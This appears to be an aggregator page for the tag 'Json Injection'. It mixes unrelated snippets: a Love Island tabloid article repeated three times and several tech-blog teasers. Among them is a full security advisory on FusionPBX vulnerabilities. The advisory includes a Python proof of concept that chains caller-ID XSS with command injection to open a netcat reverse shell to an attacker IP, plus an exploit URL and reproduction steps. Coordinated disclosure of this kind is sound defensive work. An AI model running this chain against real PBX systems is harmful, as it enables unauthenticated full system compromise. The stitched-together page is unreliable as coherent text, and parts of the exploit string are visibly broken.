Json Injection

17 Jun 19
IT Tech Book

An application programming interface (API) allows developers to establish a connection with services. These services can be cloud services and assist with updating a DB, storing data, pushing data in a queue, moving data, and managing other tasks. APIs play an important role in cloud computing. Different cloud providers depend on various API types. Consumers […]

17 Jun 19
The Sun
LOVE Island looks set to be thrown into turmoil yet again as the villa gets an injection of fresh blood with TWO hunky new arrivals. Jordan Hames, 24, and Tom Walker, 29, are sure to turn the girls’ heads and leave the boys quaking in their flip flops. Tom Walker is the new arrival at the villa Jordan is also coming into the villa After tonight’s dramatic recoupling, the new boys will hopefully be a breath of fresh air to the extremely tense villa but could they cause even more trouble? Jordan, a model from Manchester, says that although he wants to get along with the lads if he sees a girl he wants, he’s going to go for it. The hunk revealed: “For me it takes a lot for me to commit to a girl so when I am single I will dabble here and then. “But when I’m committed I am 100% loyal. But only if I meet the right girl.” Temperatures are set to rise with the new arrivals Jordan has his eye on a number of ladies in the villa Jordan is a model The hunk added he has his eye on a few of the girls in the villa already. He said: “I like all of them, I’m greedy in that sense. “I like blondes, brunettes, red heads. I would say Anna, Amber, Molly-Mae and Elma are on my radar.” Jordan – who describes himself as a “smooth operator” – said he’s looking for someone with “nice eyes, good energy and good banter”, but warned he is put off by girls with “a really loud, annoying laugh”. Jordan wants a girl with nice eyes and good banter [pod_component pod_component_config_id=”20190603-carousel-d6Tx0RIY5″ pod_component_config_url=”https://www.thesun.co.uk/nu-sun-pod-component-config-prod/20190603-carousel-d6Tx0RIY5.json” pod_component_config_loader_url=”https://www.thesun.co.uk/nu-sun-pod-loaders-prod/1.59.4/componentLoader.js?107692″ src=”https%3A%2F%2Fiframe.thesun.co.uk%2Fnu-sun-pod-widgets-prod%2Fiframe-pod.html%3Fid%3D20190603-carousel-d6Tx0RIY5%26script%3Dhttps%3A%2F%2Fwww.thesun.co.uk%2Fnu-sun-pod-loaders-prod%2F1.59.4%2FcomponentLoader.js%3F107692%26config%3Dhttps%3A%2F%2Fwww.thesun.co.uk%2Fnu-sun-pod-component-config-prod%2F20190603-carousel-d6Tx0RIY5.json”] [article-rail-section title=”more on love island” posts_category=”325″ posts_number=”6″ query_type=”popular” /] Meanwhile Tom, a model from Leeds, says he has his eye on Maura, Elma and Lucie. When asked who he fancied, he admitted: “I like the new girls – Maura is a cannon. She’s gone in there and torn it up. She might be a bit too hot to handle! “I really like Elma. She’s got a look I tend to go for. From day one I liked the look of Lucie, although she seems pretty happy and settled with Joe. I’ll find out whether she is when I get in.” Tom is also a model The hunk is certainly villa body ready Tom says he is a loyal person and won’t mess people around too much in the villa Tom has his eye on Lucie even though she’s coupled up with Joe Asked if he will be loyal in the villa, he replied: “I’m a loyal person. Never say never to the wandering eye because it’s the way of the show. “You feel like you’re really into one person but then who knows? I will make calculated decisions and I’m not going to go rushing in. “But I’m loyal so I don’t think I’ll be messing people around too much.” Got a story? email digishowbiz@the-sun.co.uk or call us direct on 02077824220. We pay for videos too. Click here to upload yours. [pod_component pod_component_config_id=”20190612-signup-m0JIB5FO-” pod_component_config_url=”https://www.thesun.co.uk/nu-sun-pod-component-config-prod/20190612-signup-m0JIB5FO-.json” pod_component_config_loader_url=”https://www.thesun.co.uk/nu-sun-pod-loaders-prod/1.63.0/componentLoader.js?73454″ src=”https%3A%2F%2Fiframe.thesun.co.uk%2Fnu-sun-pod-widgets-prod%2Fiframe-pod.html%3Fid%3D20190612-signup-m0JIB5FO-%26script%3Dhttps%3A%2F%2Fwww.thesun.co.uk%2Fnu-sun-pod-loaders-prod%2F1.63.0%2FcomponentLoader.js%3F73454%26config%3Dhttps%3A%2F%2Fwww.thesun.co.uk%2Fnu-sun-pod-component-config-prod%2F20190612-signup-m0JIB5FO-.json”]
17 Jun 19
The Scottish Sun
LOVE Island looks set to be thrown into turmoil yet again as the villa gets an injection of fresh blood with TWO hunky new arrivals. Jordan Hames, 24, and Tom Walker, 29, are sure to turn the girls’ heads and leave the boys quaking in their flip flops. Tom Walker is the new arrival at the villa Jordan is also coming into the villa After tonight’s dramatic recoupling, the new boys will hopefully be a breath of fresh air to the extremely tense villa but could they cause even more trouble? Jordan, a model from Manchester, says that although he wants to get along with the lads if he sees a girl he wants, he’s going to go for it. The hunk revealed: “For me it takes a lot for me to commit to a girl so when I am single I will dabble here and then. “But when I’m committed I am 100% loyal. But only if I meet the right girl.” Temperatures are set to rise with the new arrivals Jordan has his eye on a number of ladies in the villa Jordan is a model The hunk added he has his eye on a few of the girls in the villa already. He said: “I like all of them, I’m greedy in that sense. “I like blondes, brunettes, red heads. I would say Anna, Amber, Molly-Mae and Elma are on my radar.” Jordan – who describes himself as a “smooth operator” – said he’s looking for someone with “nice eyes, good energy and good banter”, but warned he is put off by girls with “a really loud, annoying laugh”. Jordan wants a girl with nice eyes and good banter [pod_component pod_component_config_id=”20190603-carousel-d6Tx0RIY5″ pod_component_config_url=”https://www.thesun.co.uk/nu-sun-pod-component-config-prod/20190603-carousel-d6Tx0RIY5.json” pod_component_config_loader_url=”https://www.thesun.co.uk/nu-sun-pod-loaders-prod/1.59.4/componentLoader.js?107692″ src=”https%3A%2F%2Fiframe.thesun.co.uk%2Fnu-sun-pod-widgets-prod%2Fiframe-pod.html%3Fid%3D20190603-carousel-d6Tx0RIY5%26script%3Dhttps%3A%2F%2Fwww.thesun.co.uk%2Fnu-sun-pod-loaders-prod%2F1.59.4%2FcomponentLoader.js%3F107692%26config%3Dhttps%3A%2F%2Fwww.thesun.co.uk%2Fnu-sun-pod-component-config-prod%2F20190603-carousel-d6Tx0RIY5.json”] [article-rail-section title=”more on love island” posts_category=”6″ posts_number=”6″ query_type=”popular” /] Meanwhile Tom, a model from Leeds, says he has his eye on Maura, Elma and Lucie. When asked who he fancied, he admitted: “I like the new girls – Maura is a cannon. She’s gone in there and torn it up. She might be a bit too hot to handle! “I really like Elma. She’s got a look I tend to go for. From day one I liked the look of Lucie, although she seems pretty happy and settled with Joe. I’ll find out whether she is when I get in.” Tom is also a model The hunk is certainly villa body ready Tom says he is a loyal person and won’t mess people around too much in the villa Tom has his eye on Lucie even though she’s coupled up with Joe Asked if he will be loyal in the villa, he replied: “I’m a loyal person. Never say never to the wandering eye because it’s the way of the show. “You feel like you’re really into one person but then who knows? I will make calculated decisions and I’m not going to go rushing in. “But I’m loyal so I don’t think I’ll be messing people around too much.” Got a story? email digishowbiz@the-sun.co.uk or call us direct on 02077824220. We pay for videos too. Click here to upload yours. [pod_component pod_component_config_id=”20190612-signup-m0JIB5FO-” pod_component_config_url=”https://www.thesun.co.uk/nu-sun-pod-component-config-prod/20190612-signup-m0JIB5FO-.json” pod_component_config_loader_url=”https://www.thesun.co.uk/nu-sun-pod-loaders-prod/1.63.0/componentLoader.js?73454″ src=”https%3A%2F%2Fiframe.thesun.co.uk%2Fnu-sun-pod-widgets-prod%2Fiframe-pod.html%3Fid%3D20190612-signup-m0JIB5FO-%26script%3Dhttps%3A%2F%2Fwww.thesun.co.uk%2Fnu-sun-pod-loaders-prod%2F1.63.0%2FcomponentLoader.js%3F73454%26config%3Dhttps%3A%2F%2Fwww.thesun.co.uk%2Fnu-sun-pod-component-config-prod%2F20190612-signup-m0JIB5FO-.json”]
17 Jun 19
The Irish Sun
LOVE Island looks set to be thrown into turmoil yet again as the villa gets an injection of fresh blood with TWO hunky new arrivals. Jordan Hames, 24, and Tom Walker, 29, are sure to turn the girls’ heads and leave the boys quaking in their flip flops. Tom Walker is the new arrival at the villa Jordan is also coming into the villa After tonight’s dramatic recoupling, the new boys will hopefully be a breath of fresh air to the extremely tense villa but could they cause even more trouble? Jordan, a model from Manchester, says that although he wants to get along with the lads if he sees a girl he wants, he’s going to go for it. The hunk revealed: “For me it takes a lot for me to commit to a girl so when I am single I will dabble here and then. “But when I’m committed I am 100% loyal. But only if I meet the right girl.” Temperatures are set to rise with the new arrivals Jordan has his eye on a number of ladies in the villa Jordan is a model The hunk added he has his eye on a few of the girls in the villa already. He said: “I like all of them, I’m greedy in that sense. “I like blondes, brunettes, red heads. I would say Anna, Amber, Molly-Mae and Elma are on my radar.” Jordan – who describes himself as a “smooth operator” – said he’s looking for someone with “nice eyes, good energy and good banter”, but warned he is put off by girls with “a really loud, annoying laugh”. Jordan wants a girl with nice eyes and good banter [pod_component pod_component_config_id=”20190603-carousel-d6Tx0RIY5″ pod_component_config_url=”https://www.thesun.co.uk/nu-sun-pod-component-config-prod/20190603-carousel-d6Tx0RIY5.json” pod_component_config_loader_url=”https://www.thesun.co.uk/nu-sun-pod-loaders-prod/1.59.4/componentLoader.js?107692″ src=”https%3A%2F%2Fiframe.thesun.co.uk%2Fnu-sun-pod-widgets-prod%2Fiframe-pod.html%3Fid%3D20190603-carousel-d6Tx0RIY5%26script%3Dhttps%3A%2F%2Fwww.thesun.co.uk%2Fnu-sun-pod-loaders-prod%2F1.59.4%2FcomponentLoader.js%3F107692%26config%3Dhttps%3A%2F%2Fwww.thesun.co.uk%2Fnu-sun-pod-component-config-prod%2F20190603-carousel-d6Tx0RIY5.json”] [article-rail-section title=”more on love island” posts_category=”169″ posts_number=”6″ query_type=”popular” /] Meanwhile Tom, a model from Leeds, says he has his eye on Maura, Elma and Lucie. When asked who he fancied, he admitted: “I like the new girls – Maura is a cannon. She’s gone in there and torn it up. She might be a bit too hot to handle! “I really like Elma. She’s got a look I tend to go for. From day one I liked the look of Lucie, although she seems pretty happy and settled with Joe. I’ll find out whether she is when I get in.” Tom is also a model The hunk is certainly villa body ready Tom says he is a loyal person and won’t mess people around too much in the villa Tom has his eye on Lucie even though she’s coupled up with Joe Asked if he will be loyal in the villa, he replied: “I’m a loyal person. Never say never to the wandering eye because it’s the way of the show. “You feel like you’re really into one person but then who knows? I will make calculated decisions and I’m not going to go rushing in. “But I’m loyal so I don’t think I’ll be messing people around too much.” Got a story? email digishowbiz@the-sun.co.uk or call us direct on 02077824220. We pay for videos too. Click here to upload yours. [pod_component pod_component_config_id=”20190612-signup-m0JIB5FO-” pod_component_config_url=”https://www.thesun.co.uk/nu-sun-pod-component-config-prod/20190612-signup-m0JIB5FO-.json” pod_component_config_loader_url=”https://www.thesun.co.uk/nu-sun-pod-loaders-prod/1.63.0/componentLoader.js?73454″ src=”https%3A%2F%2Fiframe.thesun.co.uk%2Fnu-sun-pod-widgets-prod%2Fiframe-pod.html%3Fid%3D20190612-signup-m0JIB5FO-%26script%3Dhttps%3A%2F%2Fwww.thesun.co.uk%2Fnu-sun-pod-loaders-prod%2F1.63.0%2FcomponentLoader.js%3F73454%26config%3Dhttps%3A%2F%2Fwww.thesun.co.uk%2Fnu-sun-pod-component-config-prod%2F20190612-signup-m0JIB5FO-.json”]
16 Jun 19
Keith's Blog

As I noted in my Fabric Crashylitics blog entry, Crashylitics is going away somewhere between late summer and the end of 2019. I was able to do this by the use of Xamarin Forms Dependency Injection, in each project type: iOS and Android. First, of course, is to create the interface. This is what I […]

16 Jun 19
iValera

If you are looking for more information on specific topics, area of interest on Microsoft Technology, you share it with me in “Comment“; I will be happy to share my thought on those. Download complete code here Step-by-step, we are approaching real-time example of Microsoft Azure CosmosDB. Previous blog we show how to use Azure […]

11 Jun 19
INTIGRITI

Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series are curated by Mariem, better known as PentesterLand. Every week, she keeps us updated with a comprehensive list of all write-ups, tools, tutorials and resources we should not have missed. Hey hackers! These are our favorite resources shared by pentesters […]

10 Jun 19
MyBB Blog

MyBB 1.8.21 is now available, and is a security & maintenance release. This version includes updated jQuery and SCeditor, JSON Syndication format, improved PostgreSQL support, improved PHP >= 7.1 compatibility, improved search function reliability. See information on SCEditor-related theme updates. 6 security vulnerabilities addressed: High risk: Theme import stylesheet name RCE — reported by Simon […]

10 Jun 19
stevesanyal's Blog

DRAFT WORK IN PROGRESS Below are notes I’ve created from my Spring Boot learning using a variety of online courses.  Assumes you have knowledge of Java.  I wrote this in part because I find it useful to have a one stop place to lay out my understanding of how to write Spring Boot REST APIs.  […]

09 Jun 19
Xiaoqi Gao

I created this note for my own study purpose. Please see the following sharable link. https://www.evernote.com/l/AkDzmY5dFuBDZqVcArzk4LVZVMCzbdpYHX0 Week 1 Communication and Protocols ProtocolDefinition A set of a rules of how data are transmitted over the internet (between computers ) Network 4-layer model  Each layer provide protocol (rules) for certain type of data exchange and transfer Application […]

09 Jun 19
ROLANDO - MY SHARING BLOG

    Python Contents Python Introduction. 11 What is Python?. 11 What can Python do?. 11 Why Python?. 11 Good to know.. 11 Python Syntax compared to other programming languages. 11 Python Getting Started. 12 Python Install 12 Python Quickstart 12 The Python Command Line. 12 Python Syntax. 13 Execute Python Syntax. 13 Python Indentations. […]

07 Jun 19
Security Boulevard

Aon’s Cyber Solutions has recently discovered several vulnerabilities in FusionPBX, an open-source VoIP PBX application that runs on top of the FreeSWITCH VoIP switch.  These vulnerabilities allow for novel exploitation vectors, including an exploit chain that is triggered by a phone call with a malicious caller ID value that leads to remote code execution.  This post provides an overview of a selection of the discovered vulnerabilities, and details of the caller ID RCE exploit chain that combines CVE-2019-11408 and CVE-2019-11409.  Future posts will cover additional FusionPBX vulnerabilities and their exploitation, including one triggered by sending a malicious fax.  All vulnerabilities described in this post have been patched.

Timeline:

04/04/19 – Vulnerabilities disclosed to FusionPBX
04/05/19 – Developer pushes preliminary patches to the project’s Github
04/07/19 – Attempt to contact developer to discuss coordinated disclosure
04/09/19 – Developer responds and states that they do not intend to publish advisory or otherwise disclose the existence of the vulnerabilities
04/22/19 – CVE IDs obtained and shared with developer, 2nd request for coordination of public disclosure, no response received
05/22/19 – Aon provides updated patch for CVE-2019-11409 in a pull request
06/02/19 – Pull request accepted
06/06/19 – Aon public disclosure

Vulnerability Listing / Credits:

CVE-2019-11408: Dustin Cobb – XSS in Operator Panel
CVE-2019-11409: Dustin Cobb – Command Injection in Operator Panel
CVE-2019-11410: Dustin Cobb – Command Injection in Backup Module
CVE-2019-11407: Dustin Cobb – Information disclosure through debug parameter

Details:

CVE-2019-11408 – XSS in Operator Panel

The operator panel module in FusionPBX suffers from a serious XSS vulnerability in the index_inc.php file.  The caller id number string isn’t properly output encoded before being rendered.  The output of this file is used by the index.php file, which refreshes every 1500ms by making an ajax call to the index_inc.php file.  The screen is designed to be used by a call center operator who wishes to monitor call activity on all of the extensions in the system.  Because this screen is designed to be constantly monitored by the operator, this becomes a more serious issue than an XSS vulnerability on an infrequently visited page.  An attacker may inject an XSS payload into the caller id number field of an inbound call, which can originate from the PSTN.  This vulnerability can be chained with CVE-2019-11409, resulting in remote code execution by an unauthenticated attacker.  This is demonstrated by the exploit code provided below.

In summary, an attacker may initiate a call from outside of the network with a specially crafted caller id number and, should the operator have this screen up at that time, gain remote code execution resulting in full system compromise.

The vulnerable code is shown below.  On line 47 in the index_inc.php file, get_call_activity() is called:

46 //get the call activity
47         $activity = get_call_activity();

On line 40 and 41 of the get_call_activity() function, we can see that the call activity values are being retrieved from FreeSWITCH via an event socket API call. On line 114, the caller id number value is being extracted from that JSON response.  Note that, at no point, has the code performed any sanitization or html encoding operations.
app/operator_panel/resources/functions/get_call_activity.php:

37         //send the command
38                 $fp = event_socket_create($_SESSION['event_socket_ip_address'], $_SESSION['event_socket_port'], $_SESSION['event_s    ocket_password']);
39                 if ($fp) {
40                         $switch_cmd = 'show channels as json';
41                         $switch_result = event_socket_request($fp, 'api '.$switch_cmd);
42                         $json_array = json_decode($switch_result, true);
43                 }
[…]
112                                         $array[$x]["state"] = $field['state'];
113                                         $array[$x]["cid_name"] = $field['cid_name'];
114                                         $array[$x]["cid_num"] = $field['cid_num'];

Once the get_call_activity() function returns with the unsanitized caller id number value, we can see that this is extracted to the $call_number, which is then directly concatenated into the HTML on line 369:
app/operator_panel/index_inc.php:

215                 $dir_icon = 'inbound';
216                 $call_name = $activity[$ext['cid_num']]['effective_caller_id_name'];
217                 $call_number = format_phone($ext['cid_num']);
[…]
368                 $block .= "                     </td></tr></table>";
369                 $block .= "                     <span id='op_caller_details_".$extension."'><strong>".$call_name."</strong><br>".$call_number."</span>";
370                 $block .= "             </span>";

CVE-2019-11409 – Command Injection in Operator Panel

The exec.php component of the operator panel module suffers from an API command injection vulnerability.  This code is meant to send certain commands to the FreeSWITCH event socket interface, like disconnect calls or initiate call recording.  However, the command actually being sent to the event socket interface is entirely controlled by the “cmd” parameter.  Although authentication is required for exploitation, administrative privileges are not.  No CSRF protection is in place, making it possible to target authenticated users with HTML payloads that can silently exploit the issue.  It can also be chained with the XSS in CVE-2019-11408 to achieve unauthenticated remote code execution.  To exploit this issue, an authenticated user with access to the operator panel interface simply needs to make a request such as this:

https://victim-pbx1.example.com/app/operator_panel/exec.php?cmd=system%20nc%20-e%20/bin/bash%10.10.10.10%204444

The vulnerable code is shown below. On line 51, we can see that the $switch_cmd variable is being initialized with the value from a GET parameter.  While an attempt is being made to sanitize the value for normal command injection characters, none are needed in this case.  We simply issue a command directly.
/app/operator_panel/exec.php

50         if (count($_GET)>0) {
51                 $switch_cmd = trim(check_str($_GET["cmd"]));
52                 $action = trim(check_str($_GET["action"])); 

On line 162, we see that the command is being sent directly to the event socket interface:

162                 $switch_result = event_socket_request($fp, 'api '.$switch_cmd);

When sending the FreeSWITCH “system” command, any shell command can be executed within the context of the FreeSWITCH user.

Exploit Code (chains -11408 and -11409):

#!/usr/bin/python
import socket, sys
from random import randint
from hashlib import md5

# Exploitation steps:
#
# 1. First, encode an XSS payload that will be injected into the “Caller ID Number” field, or “User” component of the SIP “From” URI.
# 2. Connect to external SIP profile port and send a SIP INVITE packet with XSS payload injected into the From Field.
# 3. XSS payload will fire operator panel screen, which is designed to be monitored constantly by a call center operator.
# 4. Once XSS code executes, a call is made to the exec.php script with a reverse shell payload that connects back to a netcat listener on the attacker system.  Refer to vulnerability #2 in this document for details.


# edit these variables to set up attack
victim_addr="10.10.10.10"
victim_host="victim-pbx1.example.com"
victim_num="12125551212"

attacker_ip="10.10.10.20"
attacker_port=4444

def encode(val):
    ret=""

    for c in val:
        ret+="\\x%02x" % ord(c)

    return ret

callid=md5(str(randint(0,99999999))).hexdigest()

cmd="nc -e /bin/bash %s %d" % (attacker_ip, attacker_port)
payload="q=new XMLHttpRequest();q.open('GET','exec.php?cmd=system %s',true);q.send();" % cmd

xss=";tag=%s
To: 
Call-ID: %s
CSeq: 1 INVITE
Contact: 
Max-Forwards: 70
User-Agent: Exploit POC
Content-Type: application/sdp
Allow: INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE, MESSAGE
Content-Length: 209

v=0
o=root 1204310316 1204310316 IN IP4 127.0.0.1
s=Media Gateway
c=IN IP4 127.0.0.1
t=0 0
m=audio 4446 RTP/AVP 0 101
a=rtpmap:0 PCMU/8000
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-16
a=ptime:2
a=sendrecv""" % (victim_num, victim_host, xss, callid, victim_num, victim_host, callid)

payload=payload.replace("\n","\r\n")

s=socket.socket()

s.connect((victim_addr,5080))

print payload
print

s.send(payload)
data=s.recv(8192)

print data

Reproduction Steps:

1.    View the vulnerable operator screen in a web browser, located in this example at https://10.10.10.10/app/operator_panel/index.php
2.    Start a netcat listener on a remote system, 10.10.10.20 in this example
3.    Run the exploit code above on the remote system in another terminal window
4.    The exploit will connect to the netcat listener and provide a reverse shell

CVE-2019-11410 – Command Injection in Backup Module

The restore function in the backup module of FusionPBX suffers from a command injection vulnerability. An authenticated user with admin privileges may upload a file with a specially crafted filename which will result in remote code execution via shell command injection.

CVE-2019-11407 – Information disclosure through debug parameter

The operator panel module suffers from an information disclosure vulnerability that reveals sensitive information, such as the password for the FreeSWITCH event socket interface. This is due to a debug parameter which dumps the contents of several arrays, most notably the $_SESSION array.

07 Jun 19
Antonio's Blog

In this blog post I’ll show you how to configure a Quarkus application using the specific application.properties file as well as the Microprofile Config API. To break it into more details you will learn: How to configure a Quarkus application and have separate values for development and test How to use Microprofile Config to inject […]

07 Jun 19
IT Outsourcing China

MEAN Stack Architecture Explanation 1.   When any client makes any request, it is firstly processed by the AngularJS. AngularJS is a client-side language in JavaScript. 2.   After that, the Request enters in phase 2 which is NodeJS. NodeJS is a server-side language in JavaScript. 3.   After that Request enters in phase 3 which is ExpressJS […]

06 Jun 19
InfoSec Industry

Posted by Lukasz Siewierski, Android Security & Privacy Team We continue our PHA family highlights series with the Triada family, which was first discovered early in 2016. The main purpose of Triada apps was to install spam apps on a device that displays ads. The creators of Triada collected revenue from the ads displayed by […]